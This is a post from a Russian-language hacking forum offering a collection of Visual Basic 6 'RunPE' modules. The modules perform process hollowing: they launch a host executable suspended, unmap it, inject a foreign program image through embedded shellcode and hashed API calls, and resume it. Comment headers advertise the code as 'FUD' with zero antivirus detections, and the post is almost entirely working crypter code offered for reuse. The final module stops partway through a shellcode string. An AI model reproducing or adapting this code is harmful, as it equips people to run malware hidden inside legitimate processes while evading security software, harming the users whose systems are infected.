1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

RunPE's CallWindowProcA/W [VB6] Collection

Тема в разделе "Исходные коды", создана пользователем F.I.G.H.T.E.R, 23 дек 2013.

  1. TopicStarter Overlay
    F.I.G.H.T.E.R

    F.I.G.H.T.E.R

    Регистрация:
    14 дек 2013
    Сообщения:
    272
    Симпатии:
    822
    RunPE's CallWindowProcA/W [VB6] Collection
    Part 1

    Код:
    Option Explicit
    Option Base 0
     
    '---------------------------------------------------------------------------------------
    ' Module    : kRunPe
    ' Author    : Karcrack
    ' Date      : 230710
    ' Purpose  : Shortest way to Run PE from ByteArray
    '---------------------------------------------------------------------------------------
     
    Private Type DWORD_L
        D1                          As Long
    End Type
     
    Private Type DWORD_B
        B1      As Byte:    B2      As Byte
        B3      As Byte:    B4      As Byte
    End Type
     
    'USER32
    Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpCode As Long, Optional ByVal lParam1 As Long, Optional ByVal lParam2 As Long, Optional ByVal lParam3 As Long, Optional ByVal lParam4 As Long) As Long
     
    Private bInitialized_Inv        As Boolean
    Private ASM_gAPIPTR(170)        As Byte
    Private ASM_cCODE(255)          As Byte
     
    Private Const KERNEL32          As String = "KERNEL32"
    Private Const NTDLL            As String = "NTDLL"
     
    Public Function RunPE(ByRef bvBuff() As Byte, ByVal sHost As String, Optional ByVal sParams As String, Optional ByRef hProcess As Long) As Boolean
        Dim hModuleBase            As Long
        Dim hPE                    As Long
        Dim hSec                    As Long
        Dim ImageBase              As Long
        Dim i                      As Long
        Dim tSTARTUPINFO(16)        As Long
        Dim tPROCESS_INFORMATION(3) As Long
        Dim tCONTEXT(50)            As Long
     
        hModuleBase = VarPtr(bvBuff(0))
     
        If Not GetNumb(hModuleBase, 2) = &H5A4D Then Exit Function
     
        hPE = hModuleBase + GetNumb(hModuleBase + &H3C)
     
        If Not GetNumb(hPE) = &H4550 Then Exit Function
     
        ImageBase = GetNumb(hPE + &H34)
     
        tSTARTUPINFO(0) = &H44
        'CreateProcessW@KERNEL32
        Call Invoke(KERNEL32, &H16B3FE88, StrPtr(sHost), StrPtr(sParams), 0, 0, 0, &H4, 0, 0, VarPtr(tSTARTUPINFO(0)), VarPtr(tPROCESS_INFORMATION(0)))
        'NtUnmapViewOfSection@NTDLL
        Call Invoke(NTDLL, &HF21037D0, tPROCESS_INFORMATION(0), ImageBase)
        'NtAllocateVirtualMemory@NTDLL
        Call Invoke(NTDLL, &HD33BCABD, tPROCESS_INFORMATION(0), VarPtr(ImageBase), 0, VarPtr(GetNumb(hPE + &H50)), &H3000, &H40)
        'NtWriteVirtualMemory@NTDLL
        Call Invoke(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), ImageBase, VarPtr(bvBuff(0)), GetNumb(hPE + &H54), 0)
     
        For i = 0 To GetNumb(hPE + &H6, 2) - 1
            hSec = hPE + &HF8 + (&H28 * i)
     
            'NtWriteVirtualMemory@NTDLL
            Call Invoke(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), ImageBase + GetNumb(hSec + &HC), hModuleBase + GetNumb(hSec + &H14), GetNumb(hSec + &H10), 0)
        Next i
     
        tCONTEXT(0) = &H10007
        'NtGetContextThread@NTDLL
        Call Invoke(NTDLL, &HE935E393, tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
        'NtWriteVirtualMemory@NTDLL
        Call Invoke(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), tCONTEXT(41) + &H8, VarPtr(ImageBase), &H4, 0)
     
        tCONTEXT(44) = ImageBase + GetNumb(hPE + &H28)
     
        'NtSetContextThread@NTDLL
        Call Invoke(NTDLL, &H6935E395, tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
        'NtResumeThread@NTDLL
        Call Invoke(NTDLL, &HC54A46C8, tPROCESS_INFORMATION(1), 0)
     
        hProcess = tPROCESS_INFORMATION(0)
        RunPE = True
    End Function
     
    Private Function GetNumb(ByVal lPtr As Long, Optional ByVal lSize As Long = &H4) As Long
        'NtWriteVirtualMemory@NTDLL
        Call Invoke(NTDLL, &HC5108CC2, -1, VarPtr(GetNumb), lPtr, lSize, 0)
    End Function
     
    Public Function Invoke(ByVal sDLL As String, ByVal hHash As Long, ParamArray vParams() As Variant) As Long
        Dim vItem                  As Variant
        Dim bsTmp                  As DWORD_B
        Dim lAPI                    As Long
        Dim i                      As Long
        Dim w                      As Long
     
        If Not bInitialized_Inv Then
            For i = 0 To 170
                ASM_gAPIPTR(i) = CByte(Choose(i + 1, &HE8, &H22, &H0, &H0, &H0, &H68, &HA4, &H4E, &HE, &HEC, &H50, &HE8, &H43, &H0, &H0, &H0, &H83, &HC4, &H8, &HFF, &H74, &H24, &H4, &HFF, &HD0, &HFF, &H74, &H24, &H8, &H50, &HE8, &H30, &H0, &H0, &H0, &H83, &HC4, &H8, &HC3, &H56, &H55, &H31, &HC0, &H64, &H8B, &H70, &H30, &H8B, &H76, &HC, &H8B, &H76, &H1C, &H8B, &H6E, &H8, &H8B, &H7E, &H20, &H8B, &H36, &H38, &H47, &H18, &H75, &HF3, &H80, &H3F, &H6B, &H74, &H7, &H80, &H3F, &H4B, &H74, &H2, &HEB, &HE7, &H89, &HE8, &H5D, &H5E, &HC3, &H55, &H52, &H51, _
                                &H53, &H56, &H57, &H8B, &H6C, &H24, &H1C, &H85, &HED, &H74, &H43, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, &H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H30, &H49, &H8B, &H34, &H8B, &H1, &HEE, &H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, &HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H20, &H75, &HE1, &H8B, &H5A, &H24, &H1, &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, &H8B, &H4, &H8B, &H1, &HE8, &H5F, &H5E, &H5B, &H59, &H5A, &H5D, &HC3))
            Next i
            i = 0
            bInitialized_Inv = True
        End If
     
        lAPI = CallWindowProcW(VarPtr(ASM_gAPIPTR(0)), StrPtr(sDLL), hHash)
     
        If lAPI Then
            For w = UBound(vParams) To LBound(vParams) Step -1
                bsTmp = SliceLong(CLng(vParams(w)))
                '// PUSH ADDR
                Call PutByte(&H68, i)
                Call PutByte(bsTmp.B1, i):  Call PutByte(bsTmp.B2, i)
                Call PutByte(bsTmp.B3, i):  Call PutByte(bsTmp.B4, i)
            Next w
     
            bsTmp = SliceLong(lAPI)
            '// MOV EAX, ADDR
            Call PutByte(&HB8, i)
            Call PutByte(bsTmp.B1, i):  Call PutByte(bsTmp.B2, i)
            Call PutByte(bsTmp.B3, i):  Call PutByte(bsTmp.B4, i)
            '// CALL EAX
            Call PutByte(&HFF, i):      Call PutByte(&HD0, i)
            '// RET
            Call PutByte(&HC3, i)
     
            Invoke = CallWindowProcW(VarPtr(ASM_cCODE(0)))
        End If
    End Function
     
    Private Sub PutByte(ByVal bByte As Byte, ByRef iCounter As Long)
        ASM_cCODE(iCounter) = bByte
        iCounter = iCounter + 1
    End Sub
     
    Private Function SliceLong(ByVal lLong As Long) As DWORD_B
        Dim tL                      As DWORD_L
     
        tL.D1 = lLong
        LSet SliceLong = tL
    End Function
     
     
     
    Dim x()    As Byte
        Open Environ$("WINDIR") & "\SYSTEM32\calc.exe" For Binary As #1
            ReDim x(0 To LOF(1) - 1)
            Get #1, , x
        Close #1
        Call RunPE(x, Environ$("WINDIR") & "\SYSTEM32\notepad.exe")
    Код:
    ' ===========================================================================================================================
    ' ===========================================================================================================================
    ' => Autor: M3
    ' => RunPe + Invoke FUD baseado en el JunPE de Jhonjhon_123
    ' => Credits to Jhonjhon_123 | Karcrack | Cobein | Mike D Sutton
    ' => Detecciones : 0 | 37  (Please login or register to view links)
    ' => Flecha : 13|05|2012
    ' => sHost : Ruta al exe
    ' => sBytes: Bytes a ejecutar
    ' ===========================================================================================================================
    ' ===========================================================================================================================
    Declare  Function CallThunk8 Lib "user32" Alias "CallWindowProcA" (ByRef cCode  As Currency, Optional ByVal lP1 As Long, Optional ByVal lP2 As Long,  Optional ByVal lP3 As Long, Optional ByVal lP4 As Long) As Long
    Declare  Function ExeThunk Lib "user32" Alias "CallWindowProcA" (ByVal Address  As Any, Optional ByVal Param1 As Long, Optional ByVal Param2 As Long,  Optional ByVal Param3 As Long, Optional ByVal Param4 As Long) As Long
    Declare  Function sMulDiv Lib "kernel32" Alias "MulDiv" (ByRef a As Any,  Optional ByVal b As Long = 1, Optional ByVal c As Long = 1) As Long
    Private sVALUE                        As Byte
    Private sMEMORY(40)                    As Byte
    Private ASM_GETAPIPTR(170)            As Byte
    Private ASM_CALLCODE(255)              As Byte
    Private IMAGE_DOS_HEADER(65)          As Byte
    Private IMAGE_NT_HEADERS(256)          As Byte
    Private IMAGE_SECTION_HEADER(60)      As Byte
    Private PROCESS_INFORMATION(44)        As Byte
    Private tCONTEXT(210)                  As Byte
    Private STARTUPINFO(16)                As Long
    Private sParams                        As Long
    Private sImageBase                    As Long
    Private sProcess                      As Long
    Private sThread                        As Long
    Private SizeOfImage                    As Long
    Private SizeOfHeaders                  As Long
    Private sEntryPoint                    As Long
    Private sVirtualAddress                As Long
    Private sRawData                      As Long
    Private sRawDataPoint                  As Long
    Private sEbx                          As Long
    Private D                              As Long
    Private Y                              As Long
    Private vItem                          As Variant
    Private sSection                      As Integer
     
     
    Public Function sInject(ByVal sHost As String, ByRef sBytes() As Byte)
     
     
    For  Each vItem In Array(&H56, &H8B, &HEC, &H57, &H60,  &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D,  &H8, &H8B, &H4D, &H10, &HC1, _
    &HE9, &H2,  &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1,  &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9,  &HC2, &H10, &H0, &H10)
     
     
    sMEMORY(Y) = vItem
     
    Y = Y + 1
     
    sVALUE = 200 + 48
     
    Next
     
     
    Call MoveMemory(sMulDiv(STARTUPINFO(0)), sMulDiv(72), CLng("0"))
     
    Call MoveMemory(sMulDiv(tCONTEXT(CLng("0"))), sMulDiv(&H10007), &H1 + &H4 + &H3)
     
    Call MoveMemory(sMulDiv(IMAGE_DOS_HEADER(CLng("0"))), sMulDiv(sBytes(CLng("0"))), 72)
     
    Call MoveMemory(sMulDiv(sParams), sMulDiv(IMAGE_DOS_HEADER(60)), &H1 + &H3 + &H2)
     
    Call MoveMemory(sMulDiv(IMAGE_NT_HEADERS(CLng("0"))), sMulDiv(sBytes(sParams)), 256)
     
    Call MoveMemory(sMulDiv(sImageBase), sMulDiv(IMAGE_NT_HEADERS(52)), &H1 + &H3 + &H2)
     
    Call MoveMemory(sMulDiv(SizeOfImage), sMulDiv(IMAGE_NT_HEADERS(80)), &H1 + &H4 + &H3)
     
    Call MoveMemory(sMulDiv(SizeOfHeaders), sMulDiv(IMAGE_NT_HEADERS(84)), &H1 + &H4 + &H3)
     
    Call MoveMemory(sMulDiv(sEntryPoint), sMulDiv(IMAGE_NT_HEADERS(40)), &H1 + &H3 + &H2)
     
    Call MoveMemory(sMulDiv(sSection), sMulDiv(IMAGE_NT_HEADERS(6)), &H2)
     
    Call  Invoke("KERNEL32", "CreateProcessW", 0, StrPtr(sHost), 0, 0, &H1,  &H4, 0, 0, sMulDiv(STARTUPINFO(CLng("0"))),  sMulDiv(PROCESS_INFORMATION(CLng("0"))))
     
    Call MoveMemory(sMulDiv(sProcess), sMulDiv(PROCESS_INFORMATION(CLng("0"))), &H1 + &H3)
     
    Call MoveMemory(sMulDiv(sThread), sMulDiv(PROCESS_INFORMATION(4)), &H1 + &H3)
     
    Call Invoke("NTDLL", "NtUnmapViewOfSection", sProcess, sImageBase)
     
    Call Invoke("KERNEL32", "VirtualAllocEx", sProcess, sImageBase, SizeOfImage, &H3000&, &H40)
     
    Call Invoke("NTDLL", "NtWriteVirtualMemory", sProcess, sImageBase, sMulDiv(sBytes(CLng("0"))), SizeOfHeaders, CLng("0"))
     
    For D = 0 To sSection - 1
     
    Call MoveMemory(sMulDiv(IMAGE_SECTION_HEADER(CLng("0"))), sMulDiv(sBytes(sParams + sVALUE + 40 * D)), &H40)
     
    Call MoveMemory(sMulDiv(sVirtualAddress), sMulDiv(IMAGE_SECTION_HEADER(12)), &H1 + &H3 + &H2)
     
    Call MoveMemory(sMulDiv(sRawDataPoint), sMulDiv(IMAGE_SECTION_HEADER(16)), &H1 + &H4 + &H3)
     
    Call MoveMemory(sMulDiv(sRawData), sMulDiv(IMAGE_SECTION_HEADER(20)), &H1 + &H3)
     
    Call  Invoke("NTDLL", "NtWriteVirtualMemory", sProcess, sImageBase +  sVirtualAddress, sMulDiv(sBytes(sRawData)), sRawDataPoint, CLng("0"))
     
    Next
     
    Call Invoke("NTDLL", "NtGetContextThread", sThread, sMulDiv(tCONTEXT(CLng("0"))))
     
    Call  Invoke("NTDLL", "NtWriteVirtualMemory", sProcess, sEbx + &H4 +  &H1 + &H3, sMulDiv(sVirtualAddress), &H1 + &H3 +  &H2, CLng("0"))
     
    Call MoveMemory(sMulDiv(tCONTEXT(176)), sMulDiv(sImageBase + sEntryPoint), &H1 + &H3)
     
    Call MoveMemory(sMulDiv(sEntryPoint), sMulDiv(tCONTEXT(176)), &H1 + &H3)
     
    Call Invoke("NTDLL", "NtSetContextThread", sThread, sMulDiv(tCONTEXT(CLng("0"))))
     
    Call Invoke("NTDLL", "NtResumeThread", sThread, CLng("0"))
     
    End Function
     
     
    Public Sub MoveMemory(ByVal lpDest As Long, ByVal lpSource As Long, ByVal cBytes As Long)
     
        ExeThunk sMulDiv(sMEMORY(0)), lpDest, lpSource, cBytes, CLng("0")
     
    End Sub
     
     
     
    Function Invoke(ByVal sDLL As String, hHash As String, ParamArray vParams() As Variant) As Long
     
    On Error Resume Next
    Dim vItem                      As Variant
    Dim sThunk                      As String
     
    Call PutThunk(THUNK_GETAPIPTR, ASM_GETAPIPTR)
     
    For Each vItem In vParams
    sThunk = "68" & GetLng(vItem) & sThunk
    Next vItem
     
    Call PutThunk(sThunk & "B8" & GetLng(ExeThunk(VarPtr(ASM_GETAPIPTR(CLng("0"))), _
    StrPtr(sDLL), gHash(hHash))) & "FFD0C3" & sThunk, ASM_CALLCODE)
     
    Invoke = ExeThunk(VarPtr(ASM_CALLCODE(CLng("0"))))
     
     
    End Function
     
    Private Function gHash(strHash) As Long
    On Error Resume Next
     
    Dim i          As Long
    Dim lResult    As Long
     
    For i = 1 To Len(strHash)
    lResult = CallThunk8(-439163333029263.6533@, lResult)
    lResult = lResult + Asc(Mid(strHash, i, 1))
    Next i
    gHash = "&H" & String(8 - Len(Hex(lResult)), "0") & Hex(lResult)
     
     
    End Function
     
    Private Function GetLng(ByVal lLng As Long) As String
    On Error Resume Next
    Dim lTMP                        As Long
    lTMP  = (((lLng And &HFF000000) \ &H1000000) And &HFF&) Or  ((lLng And &HFF0000) \ &H100&) Or ((lLng And  &HFF00&) * &H100&) Or ((lLng And &H7F&) *  &H1000000) ' by Mike D Sutton
    If (lLng And &H80&) Then lTMP = lTMP Or &H80000000
    GetLng = String(8 - Len(Hex(lTMP)), "0") & Hex(lTMP)
    End Function
     
    Private Sub PutThunk(ByVal sThunk As String, ByRef bvRet() As Byte)
    On Error Resume Next
    Dim i                          As Long
    For i = 0 To Len(sThunk) - 1 Step 2
    bvRet((i / 2)) = ("&H" & Mid(sThunk, i + 1, 2))
    Next i
    End Sub
     
    Function THUNK_GETAPIPTR() As String
    THUNK_GETAPIPTR = "E82200000068A44E0EEC50E84300000083C408FF742404FFD0FF7424"
    THUNK_GETAPIPTR = THUNK_GETAPIPTR & "0850E83000000083C408C3565531C0648B70308B760C8B761C8B6E08"
    THUNK_GETAPIPTR = THUNK_GETAPIPTR & "8B7E208B3638471875F3803F6B7407803F4B7402EBE789E85D5EC355"
    THUNK_GETAPIPTR = THUNK_GETAPIPTR & "52515356578B6C241C85ED74438B453C8B54057801EA8B4A188B5A20"
    THUNK_GETAPIPTR = THUNK_GETAPIPTR & "01EBE330498B348B01EE31FF31C0FCAC84C07407C1CF0D01C7EBF43B"
    THUNK_GETAPIPTR = THUNK_GETAPIPTR & "7C242075E18B5A2401EB668B0C4B8B5A1C01EB8B048B01E85F5E5B595A5DC3"
    End Function
    Код:
    ' ===========================================================================================================================
    ' ===========================================================================================================================
    ' => Autor: M3
    ' => RunPe + HashInvoke FUD baseado en el JunPE de Jhonjhon_123
    ' => Credits to Jhonjhon_123 | Karcrack | Cobein | Mike D Sutton
    ' => Detecciones : 0 | 37  (Please login or register to view links)
    ' => Flecha : 03|06|2012
    ' => sHost : Ruta al exe
    ' => sBytes: Bytes a ejecutar
    ' ===========================================================================================================================
    ' ===========================================================================================================================
    Declare  Function CallWindowProcA Lib "USER32" (ByVal lpCode As Long, Optional  ByVal lParam1 As Long, Optional ByVal lParam2 As Long, Optional ByVal  lParam3 As Long, Optional ByVal lParam4 As Long) As Long
    Private sVALUE                        As Byte
    Private sMEMORY(40)                    As Byte
    Private ASM_GETAPIPTR(170)            As Byte
    Private ASM_CALLCODE(255)              As Byte
    Private IMAGE_DOS_HEADER(65)          As Byte
    Private IMAGE_NT_HEADERS(256)          As Byte
    Private IMAGE_SECTION_HEADER(60)      As Byte
    Private PROCESS_INFORMATION(44)        As Byte
    Private tCONTEXT(210)                  As Byte
    Private STARTUPINFO(16)                As Long
    Private sParams                        As Long
    Private sImageBase                    As Long
    Private sProcess                      As Long
    Private sThread                        As Long
    Private SizeOfImage                    As Long
    Private SizeOfHeaders                  As Long
    Private sEntryPoint                    As Long
    Private sVirtualAddress                As Long
    Private sRawData                      As Long
    Private sRawDataPoint                  As Long
    Private sEbx                          As Long
    Private D                              As Long
    Private Y                              As Long
    Private vItem                          As Variant
    Private sSection                      As Integer
    Private Type DWORD_L
        D1      As Long
    End Type
    Private Type DWORD_B
        B1      As Byte
        B2      As Byte
        B3      As Byte
        B4      As Byte
    End Type
     
     
    Public Function sInject(ByVal sHost As String, ByRef sBytes() As Byte)
     
     
    For  Each vItem In Array(&H56, &H8B, &HEC, &H57, &H60,  &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D,  &H8, &H8B, &H4D, _
    &H10, &HC1, &HE9, &H2,  &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1,  &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, _
    &HC2, &H10, &H0, &H10)
     
     
    sMEMORY(Y) = vItem
     
    Y = Y + 1
     
    sVALUE = 200 + 48
     
    Next
     
     
    Call MoveMemory(Varptr(STARTUPINFO(0)), Varptr(72), CLng("0"))
     
    Call MoveMemory(Varptr(tCONTEXT(CLng("0"))), Varptr(&H10007), &H1 + &H4 + &H3)
     
    Call MoveMemory(Varptr(IMAGE_DOS_HEADER(CLng("0"))), Varptr(sBytes(CLng("0"))), 72)
     
    Call MoveMemory(Varptr(sParams), Varptr(IMAGE_DOS_HEADER(60)), &H1 + &H3 + &H2)
     
    Call MoveMemory(Varptr(IMAGE_NT_HEADERS(CLng("0"))), Varptr(sBytes(sParams)), 256)
     
    Call MoveMemory(Varptr(sImageBase), Varptr(IMAGE_NT_HEADERS(52)), &H1 + &H3 + &H2)
     
    Call MoveMemory(Varptr(SizeOfImage), Varptr(IMAGE_NT_HEADERS(80)), &H1 + &H4 + &H3)
     
    Call MoveMemory(Varptr(SizeOfHeaders), Varptr(IMAGE_NT_HEADERS(84)), &H1 + &H4 + &H3)
     
    Call MoveMemory(Varptr(sEntryPoint), Varptr(IMAGE_NT_HEADERS(40)), &H1 + &H3 + &H2)
     
    Call MoveMemory(Varptr(sSection), Varptr(IMAGE_NT_HEADERS(6)), &H2)
     
    Call  sHashInv("KERNEL32", &H16B3FE88, 0, StrPtr(sHost), 0, 0, &H1,  &H4, 0, 0, Varptr(STARTUPINFO(CLng("0"))),  Varptr(PROCESS_INFORMATION(CLng("0"))))
     
    Call MoveMemory(Varptr(sProcess), Varptr(PROCESS_INFORMATION(CLng("0"))), &H1 + &H3)
     
    Call MoveMemory(Varptr(sThread), Varptr(PROCESS_INFORMATION(4)), &H1 + &H3)
     
    Call sHashInv("NTDLL", &HF21037D0, sProcess, sImageBase)
     
    Call sHashInv("KERNEL32", &H6E1A959C, sProcess, sImageBase, SizeOfImage, &H3000&, &H40)
     
    Call sHashInv("NTDLL", &HC5108CC2, sProcess, sImageBase, Varptr(sBytes(CLng("0"))), SizeOfHeaders, CLng("0"))
     
    For D = 0 To sSection - 1
     
    Call MoveMemory(Varptr(IMAGE_SECTION_HEADER(CLng("0"))), Varptr(sBytes(sParams + sVALUE + 40 * D)), &H40)
     
    Call MoveMemory(Varptr(sVirtualAddress), Varptr(IMAGE_SECTION_HEADER(12)), &H1 + &H3 + &H2)
     
    Call MoveMemory(Varptr(sRawDataPoint), Varptr(IMAGE_SECTION_HEADER(16)), &H1 + &H4 + &H3)
     
    Call MoveMemory(Varptr(sRawData), Varptr(IMAGE_SECTION_HEADER(20)), &H1 + &H3)
     
    Call  sHashInv("NTDLL", &HC5108CC2, sProcess, sImageBase +  sVirtualAddress, Varptr(sBytes(sRawData)), sRawDataPoint, CLng("0"))
     
    Next
     
    Call sHashInv("NTDLL", &HE935E393, sThread, Varptr(tCONTEXT(CLng("0"))))
     
    Call  sHashInv("NTDLL", &HC5108CC2, sProcess, sEbx + &H4 + &H1 +  &H3, Varptr(sVirtualAddress), &H1 + &H3 + &H2,  CLng("0"))
     
    Call MoveMemory(Varptr(tCONTEXT(176)), Varptr(sImageBase + sEntryPoint), &H1 + &H3)
     
    Call MoveMemory(Varptr(sEntryPoint), Varptr(tCONTEXT(176)), &H1 + &H3)
     
    Call sHashInv("NTDLL", &H6935E395, sThread, Varptr(tCONTEXT(CLng("0"))))
     
    Call sHashInv("NTDLL", &HC54A46C8, sThread, CLng("0"))
     
    End Function
     
     
    Public Sub MoveMemory(ByVal lpDest As Long, ByVal lpSource As Long, ByVal cBytes As Long)
     
        Call sHashInv("USER32", &HC8358393, Varptr(sMEMORY(0)), lpDest, lpSource, cBytes, CLng("0"))
     
    End Sub
     
     
     
     
    Function sHashInv(ByVal sDll As String, ByVal sHashCode As Long, ParamArray sParams() As Variant) As Long
     
     
        Dim vItem                      As Variant
        Dim i                          As Long
        Dim W                          As Long
        Dim sAsmPtr(0 To 170)      As Byte
        Dim sAsmCode(0 To 255)      As Byte
     
     
     
            For Each vItem In Array _
    _
    _
            (&HE8, &H22, &H0, &H0, &H0, &H68,  &HA4, &H4E, &HE, &HEC, &H50, &HE8, &H43,  &H0, &H0, &H0, &H83, &HC4, &H8, _
            &HFF, &H74, &H24, &H4, &HFF, &HD0, &HFF,  &H74, &H24, &H8, &H50, &HE8, &H30, &H0,  &H0, &H0, &H83, &HC4, &H8, _
            &HC3,  &H56, &H55, &H31, &HC0, &H64, &H8B, &H70,  &H30, &H8B, &H76, &HC, &H8B, &H76, &H1C,  &H8B, &H6E, &H8, _
            &H8B, &H7E, &H20,  &H8B, &H36, &H38, &H47, &H18, &H75, &HF3,  &H80, &H3F, &H6B, &H74, &H7, &H80, &H3F,  &H4B, _
            &H74, &H2, &HEB, &HE7, &H89,  &HE8, &H5D, &H5E, &HC3, &H55, &H52, &H51,  &H53, &H56, &H57, &H8B, &H6C, _
            &H24,  &H1C, &H85, &HED, &H74, &H43, &H8B, &H45,  &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA,  &H8B, _
            &H4A, &H18, &H8B, &H5A, &H20,  &H1, &HEB, &HE3, &H30, &H49, &H8B, &H34,  &H8B, &H1, &HEE, _
            &H31, &HFF, &H31,  &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7,  &HC1, &HCF, &HD, &H1, _
            &HC7, &HEB,  &HF4, &H3B, &H7C, &H24, &H20, &H75, &HE1,  &H8B, &H5A, &H24, &H1, _
            &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, &H8B, _
            &H4, &H8B, &H1, &HE8, &H5F, &H5E, &H5B, &H59, &H5A, &H5D, &HC3)
     
     
            sAsmPtr(i) = vItem: i = i + 1
            Next vItem: i = 0
     
     
            For W = UBound(sParams) To LBound(sParams) Step -1
     
                sAsmCode(i) = "&H" & "68"
                i = i + 1
                sAsmCode(i) = sLong(sParams(W)).B1
                i = i + 1
                sAsmCode(i) = sLong(sParams(W)).B2
                i = i + 1
                sAsmCode(i) = sLong(sParams(W)).B3
                i = i + 1
                sAsmCode(i) = sLong(sParams(W)).B4
                i = i + 1
     
            Next W
     
     
                sAsmCode(i) = "&H" & "B8"
                i = i + 1
                sAsmCode(i) = sLong(CallWindowProcA(Varptr(sAsmPtr(0)), StrPtr(sDll), sHashCode)).B1
                i = i + 1: _
                sAsmCode(i) = sLong(CallWindowProcA(Varptr(sAsmPtr(0)), StrPtr(sDll), sHashCode)).B2
                i = i + 1: _
                sAsmCode(i) = sLong(CallWindowProcA(Varptr(sAsmPtr(0)), StrPtr(sDll), sHashCode)).B3
                i = i + 1: _
                sAsmCode(i) = sLong(CallWindowProcA(Varptr(sAsmPtr(0)), StrPtr(sDll), sHashCode)).B4
                i = i + 1: _
                sAsmCode(i) = "&H" & "FF": i = i + 1: sAsmCode(i) = "&H" & "D0"
                i = i + 1: _
                sAsmCode(i) = "&H" & "C3"
                i = i + 1: _
                sHashInv = CallWindowProcA(Varptr(sAsmCode(0)))
     
     
    End Function
     
    Private Function sLong(ByVal lLong As Long) As DWORD_B
     
        Dim tL              As DWORD_L
     
        tL.D1 = lLong: LSet sLong = tL
     
    End Function
    --- добавлено: 23 дек 2013 в 14:14 ---
    Part 2

    Код:
    Option Explicit
     
    '---------------------------------------------------------------------------------------
    ' Module    : mshRunPE_Strings
    ' Author    : iCodeInVB6
    ' Now      : 05/16/2012 11:40
    ' Purpose  : Run executable in memory
    '            Only uses CallWindowProc & shellcode
    ' Credits  : hamavb <-- made the shellcode!
    ' Tested    : Win7 x64
    '---------------------------------------------------------------------------------------
     
    'USER32
    Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
     
    Private s_ASM(7) As String
    Private b_ASM(1287) As Byte
     
    Public Sub RunPE(ByVal TargetHost As String, bBuffer() As Byte)
        Dim i As Long
        Dim j As Long
        Dim k As Long
     
        s_ASM(0) = "60E84E0000006B00650072006E0065006C003300320000006E00740064006C006C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005B8BFC6A42E8BB0300008B54242889118B54242C6A3EE8AA03000089116A4AE8A103000089396A1E6A3CE89D0300006A2268F4000000E8910300006A266A24E8880300006A2A6A40E87F030000"
        s_ASM(1) = "6A2E6A0CE8760300006A3268C8000000E86A0300006A2AE85C0300008B09C701440000006A12E84D030000685BE814CF51E8790300006A3EE83B0300008BD16A1EE8320300006A40FF32FF31FFD06A12E823030000685BE814CF51E84F0300006A1EE8110300008B098B513C6A3EE8050300008B3903FA6A22E8FA0200008B0968F80000005751FFD06A00E8E80200006888FEB31651E8140300006A2EE8D60200"
        s_ASM(2) = "008B396A2AE8CD0200008B116A42E8C402000057526A006A006A046A006A006A006A00FF31FFD06A12E8A902000068D03710F251E8D50200006A22E8970200008B116A2EE88E0200008B09FF7234FF31FFD06A00E87E020000689C951A6E51E8AA0200006A22E86C0200008B118B396A2EE8610200008B096A406800300000FF7250FF7734FF31FFD06A36E8470200008BD16A22E83E0200008B396A3EE8350200"
        s_ASM(3) = "008B316A22E82C0200008B016A2EE8230200008B0952FF775456FF7034FF316A00E81002000068A16A3DD851E83C02000083C40CFFD06A12E8F9010000685BE814CF51E8250200006A22E8E70100008B1183C2066A3AE8DB0100006A025251FFD06A36E8CE010000C70100000000B8280000006A36E8BC010000F7216A1EE8B30100008B118B523C81C2F800000003D06A3EE89F01000003116A26E8960100006A"
        s_ASM(4) = "2852FF316A12E88A010000685BE814CF51E8B601000083C40CFFD06A26E8730100008B398B098B71146A3EE86501000003316A26E85C0100008B098B510C6A22E8500100008B090351346A46E8440100008BC16A2EE83B0100008B0950FF77105652FF316A00E82A01000068A16A3DD851E85601000083C40CFFD06A36E8130100008B1183C20189116A3AE8050100008B093BCA0F8533FFFFFF6A32E8F4000000"
        s_ASM(5) = "8B09C701070001006A00E8E500000068D2C7A76851E8110100006A32E8D30000008B116A2EE8CA0000008B0952FF7104FFD06A22E8BB0000008B3983C7346A32E8AF0000008B318BB6A400000083C6086A2EE89D0000008B116A46E894000000516A045756FF326A00E88600000068A16A3DD851E8B200000083C40CFFD06A22E86F0000008B098B51280351346A32E8600000008B0981C1B000000089116A00E8"
        s_ASM(6) = "4F00000068D3C7A7E851E87B0000006A32E83D0000008BD16A2EE8340000008B09FF32FF7104FFD06A00E82400000068883F4A9E51E8500000006A2EE8120000008B09FF7104FFD06A4AE8040000008B2161C38BCB034C2404C36A00E8F2FFFFFF6854CAAF9151E81E0000006A406800100000FF7424186A00FFD0FF742414E8CFFFFFFF890183C410C3E82200000068A44E0EEC50E84B00000083C408FF742404"
